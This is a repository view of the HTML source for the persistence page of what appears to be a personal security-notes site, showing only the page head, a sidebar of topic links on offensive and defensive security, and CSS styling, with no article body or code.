stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/persistence/persistence.html

686 lines
61 KiB
HTML
Raw Blame History

<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<!-- mathjax -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
<title>In the Open</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
<a href="/" style="text-decoration:none">In the Open</a>
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
<ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="linkClick(this); return false;" ><summary>Canary_bypass</summary><ul><li><a href="/exploit/binaries/canary_bypass/canary_bypass.html">canary_bypass</a></li></ul></details><details id=format_string ontoggle="linkClick(this); return false;" ><summary>Format_string</summary><ul><li><a href="/exploit/binaries/format_string/format_string.html">format_string</a></li></ul></details><details id=integral_promotion ontoggle="linkClick(this); return false;" ><summary>Integral_promotion</summary><ul><li><a href="/exploit/binaries/integral_promotion/integral_promotion.html">integral_promotion</a></li></ul></details><li><a href="/exploit/binaries/plt_got.html">plt_got</a></li><li><a href="/exploit/binaries/r2.html">r2</a></li><li><a href="/exploit/binaries/ret2libc.html">ret2libc</a></li></ul></details><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exploit/dns/zone_transfer.html">zone_transfer</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><li><a href="/exploit/hashes/collision.html">collision</a></li></ul></details><details id=imagemagick ontoggle="linkClick(this); return false;" ><summary>Imagemagick</summary><ul><li><a href="/exploit/imagemagick/imagetragick.html">imagetragick</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><details id=OGNL ontoggle="linkClick(this); return false;" ><summary>OGNL</summary><ul><li><a href="/exploit/java/OGNL/cve_2022_26134.html">cve_2022_26134</a></li></ul></details><li><a href="/exploit/java/ghidra_debug.html">ghidra_debug</a></li><li><a href="/exploit/java/ghostcat.html">ghostcat</a></li><li><a href="/exploit/java/log4shell.html">log4shell</a></li><li><a href="/exploit/java/spring4shell.html">spring4shell</a></li></ul></details><details id=level3_hypervisor ontoggle="linkClick(this); return false;" ><summary>Level3_hypervisor</summary><ul><details id=docker_sec ontoggle="linkClick(this); return false;" ><summary>Docker_sec</summary><ul><li><a href="/exploit/level3_hypervisor/docker_sec/docker.html">docker</a></li></ul></details><li><a href="/exploit/level3_hypervisor/kubernetes.html">kubernetes</a></li><li><a href="/exploit/level3_hypervisor/lxc.html">lxc</a></li><li><a href="/exploit/level3_hypervisor/microk8s.html">microk8s</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exploit/linux/capabilities.html">capabilities</a></li><details id=dirty_pipe ontoggle="linkClick(this); return false;" ><summary>Dirty_pipe</summary><ul><li><a href="/exploit/linux/dirty_pipe/dirty_pipe.html">dirty_pipe</a></li></ul></details><li><a href="/exploit/linux/exiftool.html">exiftool</a></li><li><a href="/exploit/linux/groups.html">groups</a></li><li><a href="/exploit/linux/ld_preload.html">ld_preload</a></li><li><a href="/exploit/linux/nfs_rootsquash.html">nfs_rootsquash</a></li><li><a href="/exploit/linux/overlayfs.html">overlayfs</a></li><details id=pkexec ontoggle="linkClick(this); return false;" ><summary>Pkexec</summary><ul><li><a href="/exploit/linux/pkexec/CVE_2021_4034.html">CVE_2021_4034</a></li></ul></details><li><a href="/exploit/linux/polkit.html">polkit</a></li><li><a href="/exploit/linux/racing_conditions.html">racing_conditions</a></li><li><a href="/exploit/linux/setcap.html">setcap</a></li><li><a href="/exploit/linux/shared_object_injection.html">shared_object_injection</a></li><li><a href="/exploit/linux/shell_shock.html">shell_shock</a></li><details id=sudo ontoggle="linkClick(this); return false;" ><summary>Sudo</summary><ul><li><a href="/exploit/linux/sudo/CVE_2019_14287.html">CVE_2019_14287</a></li><li><a href="/exploit/linux/sudo/CVE_2019_18634.html">CVE_2019_18634</a></li><li><a href="/exploit/linux/sudo/baron_samedit.html">baron_samedit</a></li><li><a href="/exploit/linux/sudo/tokens.html">tokens</a></li></ul></details><li><a href="/exploit/linux/wildard_exploitation.html">wildard_exploitation</a></li></ul></details><details id=macOS ontoggle="linkClick(this); return false;" ><summary>MacOS</summary><ul></ul></details><details id=network ontoggle="linkClick(this); return false;" ><summary>Network</summary><ul><li><a href="/exploit/network/mac_spoofing.html">mac_spoofing</a></li></ul></details><details id=padding ontoggle="linkClick(this); return false;" ><summary>Padding</summary><ul><li><a href="/exploit/padding/padbuster.html">padbuster</a></li></ul></details><details id=python ontoggle="linkClick(this); return false;" ><summary>Python</summary><ul><li><a href="/exploit/python/code_injection.html">code_injection</a></li><li><a href="/exploit/python/jail_escape.html">jail_escape</a></li><li><a href="/exploit/python/lib_hijack.html">lib_hijack</a></li><li><a href="/exploit/python/pickle.html">pickle</a></li><li><a href="/exploit/python/pwntools.html">pwntools</a></li><li><a href="/exploit/python/pyc.html">pyc</a></li><li><a href="/exploit/python/scapy.html">scapy</a></li></ul></details><details id=samba ontoggle="linkClick(this); return false;" ><summary>Samba</summary><ul><li><a href="/exploit/samba/smbmap.html">smbmap</a></li></ul></details><details id=sqli ontoggle="linkClick(this); return false;" ><summary>Sqli</summary><ul><li><a href="/exploit/sqli/mssql.html">mssql</a></li><li><a href="/exploit/sqli/no_sqli.html">no_sqli</a></li><li><a href="/exploit/sqli/sqli.html">sqli</a></li><li><a href="/exploit/sqli/sqlmap.html">sqlmap</a></li></ul></details><details id=ssl_tls ontoggle="linkClick(this); return false;" ><summary>Ssl_tls</summary><ul><li><a href="/exploit/ssl_tls/heartbleed.html">heartbleed</a></li></ul></details><details id=web ontoggle="linkClick(this); return false;" ><summary>Web</summary><ul><details id=bypass_rate_limiting ontoggle="linkClick(this); return false;" ><summary>Bypass_rate_limiting</summary><ul><li><a href="/exploit/web/bypass_rate_limiting/bypass_rate_limiting.html">bypass_rate_limiting</a></li></ul></details><li><a href="/exploit/web/command_injection.html">command_injection</a></li><details id=content_security_policy ontoggle="linkClick(this); return false;" ><summary>Content_security_policy</summary><ul><li><a href="/exploit/web/content_security_policy/content_security_policy.html">content_security_policy</a></li></ul></details><li><a href="/exploit/web/cookie_tampering.html">cookie_tampering</a></li><li><a href="/exploit/web/csrf.html">csrf</a></li><details id=forced_browsing ontoggle="linkClick(this); return false;" ><summary>Forced_browsing</summary><ul><li><a href="/exploit/web/forced_browsing/forced_browsing.html">forced_browsing</a></li></ul></details><li><a href="/exploit/web/http_header_injection.html">http_header_injection</a></li><details id=idor ontoggle="linkClick(this); return false;" ><summary>Idor</summary><ul><li><a href="/exploit/web/idor/idor.html">idor</a></li></ul></details><details id=javascript ontoggle="linkClick(this); return false;" ><summary>Javascript</summary><ul><li><a href="/exploit/web/javascript/bypass_filters.html">bypass_filters</a></li><li><a href="/exploit/web/javascript/prototype_pollution.html">prototype_pollution</a></li></ul></details><details id=jwt ontoggle="linkClick(this); return false;" ><summary>Jwt</summary><ul><li><a href="/exploit/web/jwt/jwt.html">jwt</a></li></ul></details><li><a href="/exploit/web/local_file_inclusion.html">local_file_inclusion</a></li><li><a href="/exploit/web/methodology.html">methodology</a></li><details id=nodejs ontoggle="linkClick(this); return false;" ><summary>Nodejs</summary><ul><li><a href="/exploit/web/nodejs/deserialization.html">deserialization</a></li></ul></details><details id=php ontoggle="linkClick(this); return false;" ><summary>Php</summary><ul><li><a href="/exploit/web/php/command_injection.html">command_injection</a></li><li><a href="/exploit/web/php/password_reset.html">password_reset</a></li><li><a href="/exploit/web/php/php_base64_filter.html">php_base64_filter</a></li><li><a href="/exploit/web/php/php_image_exif.html">php_image_exif</a></li><li><a href="/exploit/web/php/php_user_agent_rce.html">php_user_agent_rce</a></li><li><a href="/exploit/web/php/preload_lib.html">preload_lib</a></li><li><a href="/exploit/web/php/unserialize.html">unserialize</a></li></ul></details><li><a href="/exploit/web/re_registration.html">re_registration</a></li><li><a href="/exploit/web/remote_file_inclusion.html">remote_file_inclusion</a></li><details id=ssrf ontoggle="linkClick(this); return false;" ><summary>Ssrf</summary><ul><li><a href="/exploit/web/ssrf/iframe.html">iframe</a></li><li><a href="/exploit/web/ssrf/ssrf.html">ssrf</a></li></ul></details><details id=ssti ontoggle="linkClick(this); return false;" ><summary>Ssti</summary><ul><li><a href="/exploit/web/ssti/ssti.html">ssti</a></li></ul></details><li><a href="/exploit/web/url_forgery.html">url_forgery</a></li><li><a href="/exploit/web/wordpress.html">wordpress</a></li><li><a href="/exploit/web/xpath.html">xpath</a></li><li><a href="/exploit/web/xss.html">xss</a></li><details id=xxe ontoggle="linkClick(this); return false;" ><summary>Xxe</summary><ul><li><a href="/exploit/web/xxe/wp_xxe_.html">wp_xxe_</a></li><li><a href="/exploit/web/xxe/xml_external_entity.html">xml_external_entity</a></li></ul></details></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=dll_hijacking ontoggle="linkClick(this); return false;" ><summary>Dll_hijacking</summary><ul><li><a href="/exploit/windows/dll_hijacking/dll_hijacking.html">dll_hijacking</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/windows/docs/always_installed_elevated.html">always_installed_elevated</a></li><li><a href="/exploit/windows/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/exploit/windows/docs/dpapi.html">dpapi</a></li><li><a href="/exploit/windows/docs/impacket.html">impacket</a></li><li><a href="/exploit/windows/docs/llmnr.html">llmnr</a></li><li><a href="/exploit/windows/docs/lnk_exploit.html">lnk_exploit</a></li><li><a href="/exploit/windows/docs/pass_the_hash.html">pass_the_hash</a></li><li><a href="/exploit/windows/docs/password_in_registry.html">password_in_registry</a></li><li><a href="/exploit/windows/docs/potatoes.html">potatoes</a></li><li><a href="/exploit/windows/docs/printnightmare.html">printnightmare</a></li><li><a href="/exploit/windows/docs/responder.html">responder</a></li><li><a href="/exploit/windows/docs/unquoted_path.html">unquoted_path</a></li></ul></details><details id=macros ontoggle="linkClick(this); return false;" ><summary>Macros</summary><ul><li><a href="/exploit/windows/macros/macros.html">macros</a></li></ul></details><details id=payloads ontoggle="linkClick(this); return false;" ><summary>Payloads</summary><ul><li><a href="/exploit/windows/payloads/windows_scripting_host.html">windows_scripting_host</a></li></ul></details><details id=print_nightmare ontoggle="linkClick(this); return false;" ><summary>Print_nightmare</summary><ul><details id=CVE-2021-1675 ontoggle="linkClick(this); return false;" ><summary>CVE-2021-1675</summary><ul><details id=nightmare-dll ontoggle="linkClick(this); return false;" ><summary>Nightmare-dll</summary><ul></ul></details></ul></details><li><a href="/exploit/windows/print_nightmare/print_nightmare.html">print_nightmare</a></li></ul></details><details id=process_injection ontoggle="linkClick(this); return false;" ><summary>Process_injection</summary><ul><li><a href="/exploit/windows/process_injection/dll_injection.html">dll_injection</a></li><li><a href="/exploit/windows/process_injection/process_hollowing.html">process_hollowing</a></li><li><a href="/exploit/windows/process_injection/shellcode_injection.html">shellcode_injection</a></li><li><a href="/exploit/windows/process_injection/thread_hijacking.html">thread_hijacking</a></li></ul></details><details id=service_escalation ontoggle="linkClick(this); return false;" ><summary>Service_escalation</summary><ul><li><a href="/exploit/windows/service_escalation/service_escalation.html">service_escalation</a></li></ul></details><details id=zero_logon ontoggle="linkClick(this); return false;" ><summary>Zero_logon</summary><ul><li><a href="/exploit/windows/zero_logon/zero_logon.html">zero_logon</a></li></ul></details></ul></details><details id=yaml ontoggle="linkClick(this); return false;" ><summary>Yaml</summary><ul><li><a href="/exploit/yaml/deserialization.html">deserialization</a></li></ul></details></ul></details><details id=forensics ontoggle="linkClick(this); return false;" ><summary>Forensics</summary><ul><li><a href="/forensics/ios.html">ios</a></li><li><a href="/forensics/kape.html">kape</a></li><li><a href="/forensics/ntfs.html">ntfs</a></li><li><a href="/forensics/oletools.html">oletools</a></li><li><a href="/forensics/volatility.html">volatility</a></li><li><a href="/forensics/windows_registry.html">windows_registry</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><details id=bruteforce ontoggle="linkClick(this); return false;" ><summary>Bruteforce</summary><ul></ul></details><li><a href="/hashes/generate_wordlists.html">generate_wordlists</a></li><li><a href="/hashes/haiti.html">haiti</a></li><li><a href="/hashes/hashcat_utils.html">hashcat_utils</a></li><details id=password_cracking ontoggle="linkClick(this); return false;" ><summary>Password_cracking</summary><ul><li><a href="/hashes/password_cracking/hydra.html">hydra</a></li><li><a href="/hashes/password_cracking/john.html">john</a></li><li><a href="/hashes/password_cracking/smb_challenge.html">smb_challenge</a></li><li><a href="/hashes/password_cracking/sucrack.html">sucrack</a></li><li><a href="/hashes/password_cracking/vnc.html">vnc</a></li></ul></details><details id=password_guessing ontoggle="linkClick(this); return false;" ><summary>Password_guessing</summary><ul><li><a href="/hashes/password_guessing/standard_passwords.html">standard_passwords</a></li></ul></details></ul></details><details id=misc ontoggle="linkClick(this); return false;" ><summary>Misc</summary><ul><details id=active_directory ontoggle="linkClick(this); return false;" ><summary>Active_directory</summary><ul><li><a href="/misc/active_directory/AD_CS.html">AD_CS</a></li><li><a href="/misc/active_directory/active_directory.html">active_directory</a></li><li><a href="/misc/active_directory/ad_enumeration.html">ad_enumeration</a></li><li><a href="/misc/active_directory/ad_misconfiguration.html">ad_misconfiguration</a></li><li><a href="/misc/active_directory/ad_persistence.html">ad_persistence</a></li><li><a href="/misc/active_directory/gaining_foothold_AD.html">gaining_foothold_AD</a></li><li><a href="/misc/active_directory/lateral_movement.html">lateral_movement</a></li></ul></details><li><a href="/misc/bash.html">bash</a></li><li><a href="/misc/clamav.html">clamav</a></li><li><a href="/misc/gitTools.html">gitTools</a></li><li><a href="/misc/hadoop.html">hadoop</a></li><li><a href="/misc/metasploit.html">metasploit</a></li><details id=printer_hacking ontoggle="linkClick(this); return false;" ><summary>Printer_hacking</summary><ul><li><a href="/misc/printer_hacking/preta.html">preta</a></li></ul></details><li><a href="/misc/responder.html">responder</a></li><li><a href="/misc/sandbox_evasion.html">sandbox_evasion</a></li><li><a href="/misc/smtp.html">smtp</a></li><li><a href="/misc/snort.html">snort</a></li><details id=telecommunications ontoggle="linkClick(this); return false;" ><summary>Telecommunications</summary><ul><details id=_sipvicious ontoggle="linkClick(this); return false;" ><summary>_sipvicious</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/misc/telecommunications/_sipvicious/.github/ISSUE_TEMPLATE/bug-report.html">bug-report</a></li><li><a href="/misc/telecommunications/_sipvicious/.github/ISSUE_TEMPLATE/custom.html">custom</a></li></ul></details></ul></details><details id=sipvicious ontoggle="linkClick(this); return false;" ><summary>Sipvicious</summary><ul></ul></details></ul></details><li><a href="/misc/telecommunications/sip_vicious.html">sip_vicious</a></li></ul></details><details id=threat_intelligence ontoggle="linkClick(this); return false;" ><summary>Threat_intelligence</summary><ul><li><a href="/misc/threat_intelligence/isac.html">isac</a></li><li><a href="/misc/threat_intelligence/loki.html">loki</a></li><li><a href="/misc/threat_intelligence/osquery.html">osquery</a></li><li><a href="/misc/threat_intelligence/pithus.html">pithus</a></li><li><a href="/misc/threat_intelligence/siem.html">siem</a></li><li><a href="/misc/threat_intelligence/splunk.html">splunk</a></li><li><a href="/misc/threat_intelligence/yara.html">yara</a></li></ul></details><details id=wifi ontoggle="linkClick(this); return false;" ><summary>Wifi</summary><ul><li><a href="/misc/wifi/airmon-ng.html">airmon-ng</a></li></ul></details></ul></details><details id=osint ontoggle="linkClick(this); return false;" ><summary>Osint</summary><ul><li><a href="/osint/recon_ng.html">recon_ng</a></li><details id=social_engineering ontoggle="linkClick(this); return false;" ><summary>Social_engineering</summary><ul><li><a href="/osint/social_engineering/gophish.html">gophish</a></li><li><a href="/osint/social_engineering/phishing_domain.html">phishing_domain</a></li></ul></details><li><a href="/osint/spiderfoot.html">spiderfoot</a></li><li><a href="/osint/theharvester.html">theharvester</a></li></ul></details><details id=persistence ontoggle="linkClick(this); return false;" ><summary>Persistence</summary><ul><li><a href="/persistence/bashrc.html">bashrc</a></li><li><a href="/persistence/crontab.html">crontab</a></li><li><a href="/persistence/meterpreter.html">meterpreter</a></li><li><a href="/persistence/persistence.html">persistence</a></li><li><a href="/persistence/wmi.html">wmi</a></li></ul></details><details id=post exploitation ontoggle="linkClick(this); return false;" ><summary>Post exploitation</summary><ul><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/bug_report.html">bug_report</a></li><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/feature_request.html">feature_request</a></li></ul></details></ul></details><li><a href="/post exploitation/Seatbelt/CHANGELOG.html">CHANGELOG</a></li><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=Commands ontoggle="linkClick(this); return false;" ><summary>Commands</summary><ul><details id=Windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=EventLogs ontoggle="linkClick(this); return false;" ><summary>EventLogs</summary><ul></ul></details></ul></details></ul></details><details id=Output ontoggle="linkClick(this); return false;" ><summary>Output</summary><ul></ul></details></ul></details></ul></details><details id=bc_security ontoggle="linkClick(this); return false;" ><summary>Bc_security</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/docs/c2.html">c2</a></li><li><a href="/post exploitation/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/post exploitation/docs/empire.html">empire</a></li><li><a href="/post exploitation/docs/ids_ips_evation.html">ids_ips_evation</a></li><li><a href="/post exploitation/docs/linux.html">linux</a></li><li><a href="/post exploitation/docs/metasploit.html">metasploit</a></li><li><a href="/post exploitation/docs/mimikatz.html">mimikatz</a></li><li><a href="/post exploitation/docs/mitm.html">mitm</a></li><li><a href="/post exploitation/docs/nfs_root_squash.html">nfs_root_squash</a></li><li><a href="/post exploitation/docs/powershell.html">powershell</a></li><li><a href="/post exploitation/docs/secretsdump.html">secretsdump</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/docs/windows/antivirus_evasion.html">antivirus_evasion</a></li><li><a href="/post exploitation/docs/windows/applocker.html">applocker</a></li><li><a href="/post exploitation/docs/windows/evade_event_tracing.html">evade_event_tracing</a></li><li><a href="/post exploitation/docs/windows/living_off_the_land.html">living_off_the_land</a></li><li><a href="/post exploitation/docs/windows/pass_the_hash.html">pass_the_hash</a></li><li><a href="/post exploitation/docs/windows/powershell_logs.html">powershell_logs</a></li><li><a href="/post exploitation/docs/windows/registry.html">registry</a></li><li><a href="/post exploitation/docs/windows/sebackupprivilege.html">sebackupprivilege</a></li><li><a href="/post exploitation/docs/windows/user_account_control.html">user_account_control</a></li></ul></details></ul></details><li><a href="/post exploitation/pivoting.html">pivoting</a></li><details id=priv_esc ontoggle="linkClick(this); return false;" ><summary>Priv_esc</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/docs/linux_priv_esc.html">linux_priv_esc</a></li><li><a href="/post exploitation/priv_esc/docs/pspy.html">pspy</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/priv_esc/docs/windows/add_user.html">add_user</a></li><li><a href="/post exploitation/priv_esc/docs/windows/windows_priv_esc.html">windows_priv_esc</a></li></ul></details></ul></details><details id=kernel-exploits ontoggle="linkClick(this); return false;" ><summary>Kernel-exploits</summary><ul></ul></details><details id=privesc-scripts ontoggle="linkClick(this); return false;" ><summary>Privesc-scripts</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/privesc-scripts/docs/get_script_onto_target.html">get_script_onto_target</a></li></ul></details></ul></details><details id=suid ontoggle="linkClick(this); return false;" ><summary>Suid</summary><ul></ul></details></ul></details></ul></details><details id=reverse engineering ontoggle="linkClick(this); return false;" ><summary>Reverse engineering</summary><ul><details id=android ontoggle="linkClick(this); return false;" ><summary>Android</summary><ul><li><a href="/reverse engineering/android/misc.html">misc</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse engineering/docs/deobfuscation.html">deobfuscation</a></li><li><a href="/reverse engineering/docs/dll_reversing.html">dll_reversing</a></li><li><a href="/reverse engineering/docs/firmware.html">firmware</a></li><li><a href="/reverse engineering/docs/function_mangling.html">function_mangling</a></li><li><a href="/reverse engineering/docs/scada.html">scada</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><li><a href="/reverse engineering/java/krakatau.html">krakatau</a></li></ul></details></ul></details><details id=reverse shells ontoggle="linkClick(this); return false;" ><summary>Reverse shells</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse shells/docs/evil-winrm.html">evil-winrm</a></li><li><a href="/reverse shells/docs/msfconsole.html">msfconsole</a></li><li><a href="/reverse shells/docs/msfvenom.html">msfvenom</a></li><li><a href="/reverse shells/docs/netcat.html">netcat</a></li><li><a href="/reverse shells/docs/powershell.html">powershell</a></li><li><a href="/reverse shells/docs/shell_upgrade.html">shell_upgrade</a></li><li><a href="/reverse shells/docs/socat.html">socat</a></li><li><a href="/reverse shells/docs/webshell.html">webshell</a></li></ul></details><li><a href="/reverse shells/firewalls.html">firewalls</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul></ul></details></ul></details><details id=stego ontoggle="linkClick(this); return false;" ><summary>Stego</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/stego/docs/outguess.html">outguess</a></li><li><a href="/stego/docs/remnux.html">remnux</a></li><li><a href="/stego/docs/stegbrute.html">stegbrute</a></li><li><a href="/stego/docs/steghide.html">steghide</a></li><li><a href="/stego/docs/stegoveritas.html">stegoveritas</a></li><li><a href="/stego/docs/zsteg.html">zsteg</a></li></ul></details></ul></details>
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
